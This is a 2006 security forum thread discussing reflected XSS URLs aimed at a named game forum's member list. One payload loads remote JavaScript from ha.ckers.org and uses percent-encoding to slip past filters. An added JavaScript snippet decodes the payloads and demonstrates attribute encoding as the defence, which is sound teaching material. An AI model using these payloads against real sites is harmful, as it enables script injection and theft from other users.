Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
IE cannot open *******
Posted by: Kyran
Date: September 25, 2006 05:23PM

http://bbs.conqueronline.com/memberlist.php?memberlist.php?action=getall&what=%22%3E%3Cscript%3Ealert%20('XSS')%3C/script%3E&ltr=&perpage=25&orderby=username

That works in all browsers. But the stallowned one errors IE.

http://bbs.conqueronline.com/memberlist.php?memberlist.php?action=getall&what=%22%3E%3C%73%63%72ipt%20%73%72%63%3D%68tt%70%3A%2F%2F%68%61.%63%6B%65%72%73.org%2Fs.%6As%3E%3C%2F%73%63%72%69%70%74%3E&ltr=&perpage=25&orderby=username

Any thoughts?

- Kyran

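As an added illustration (not code from the thread or from ha.ckers.org), the two URLs above carry the same injection: the second is the first with most of the bytes percent-encoded, which a URL decoder on the server collapses back to the plain tag before it is reflected. The snippet below decodes both payloads the way a query-string parser would, reflects them into a hypothetical quoted attribute (the `%22%3E` prefix suggests an attribute context, but the real memberlist.php markup is not shown in the thread), and then shows how attribute-context output encoding leaves the same input inert.

```javascript
// Added example, not part of the original post or of memberlist.php.
// The two payloads are copied from the URLs Kyran posted.
const PAYLOAD_ALERT = "%22%3E%3Cscript%3Ealert%20('XSS')%3C/script%3E";
const PAYLOAD_REMOTE =
  "%22%3E%3C%73%63%72ipt%20%73%72%63%3D%68tt%70%3A%2F%2F%68%61.%63%6B%65%72%73.org%2Fs.%6As%3E%3C%2F%73%63%72%69%70%74%3E";

// Decode a query-string value as a server-side URL decoder would:
// '+' becomes a space and each %XX becomes the byte XX. Mixing literal
// letters with %XX escapes (as in %73%63%72ipt) changes nothing after decoding,
// which is why a filter that looks for the literal string "script" in the raw
// URL does not see it.
function decodeQueryValue(value) {
  return decodeURIComponent(value.replace(/\+/g, " "));
}

// Hypothetical vulnerable reflection: the 'what' parameter written raw into a
// double-quoted attribute. Assumed template, not the forum's real markup.
function reflectUnsafe(what) {
  return '<input type="text" name="what" value="' + what + '">';
}

// HTML attribute encoding: the five characters that can close or restructure a
// quoted attribute become character references.
function encodeForHtmlAttribute(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return value.replace(/[&<>"']/g, (c) => map[c]);
}

// Same template with the value encoded for the attribute context it lands in.
function reflectSafe(what) {
  return (
    '<input type="text" name="what" value="' + encodeForHtmlAttribute(what) + '">'
  );
}

// Count <script tags (case-insensitive) in a rendered fragment: the raw
// reflection produces one, the encoded reflection none.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Stand-alone demonstration of the two payloads.
for (const p of [PAYLOAD_ALERT, PAYLOAD_REMOTE]) {
  const decoded = decodeQueryValue(p);
  console.log("decoded:        ", decoded);
  console.log("unsafe, scripts:", countScriptTags(reflectUnsafe(decoded)));
  console.log("safe,   scripts:", countScriptTags(reflectSafe(decoded)));
}
```

Both payloads decode to a `">` that closes the attribute and the tag, followed by a `<script>` element; the only difference is whether the script body is inline (`alert`) or loaded from ha.ckers.org. Encoding for the attribute context turns the leading `">` into `&quot;&gt;`, so the browser never leaves the attribute value.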
Re: IE cannot open *******
Posted by: rsnake
Date: September 25, 2006 06:07PM

Hmm... no, I'm not sure why it's doing that... but this is exactly the reason I don't like using defacement style scripts - they muddy the water. You could easily parse it apart, fix the issue and get it working, but why? The real issue is that it CAN include remote JavaScript. It's an interesting problem though. At what point does it make people aware (enough) of the dangers of the issue? Should I include scripts that kill people's browsers (a la http://ha.ckers.org/weird/popup.html ) or something similar? Personally I've always thought the alert box was sufficient to let people know the danger without actually causing anything on the page to die inadvertently.

- RSnake
Gotta love it. http://ha.ckers.org

Re: IE cannot open *******
Posted by: Kyran
Date: September 25, 2006 06:25PM

I actually have been using just an alert as of late, but I frequent a section of that forum and someone asked "But it's just an alert, how is that affecting anyone?" so, I switched to stallowned.

- Kyran

Re: IE cannot open *******
Posted by: WhiteAcid
Date: September 25, 2006 06:26PM

I made the same error here: http://www.whiteacid.org/HTS/IE_bug.html

An explanation: http://www.shaftek.org/blog/archives/000212.html

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer
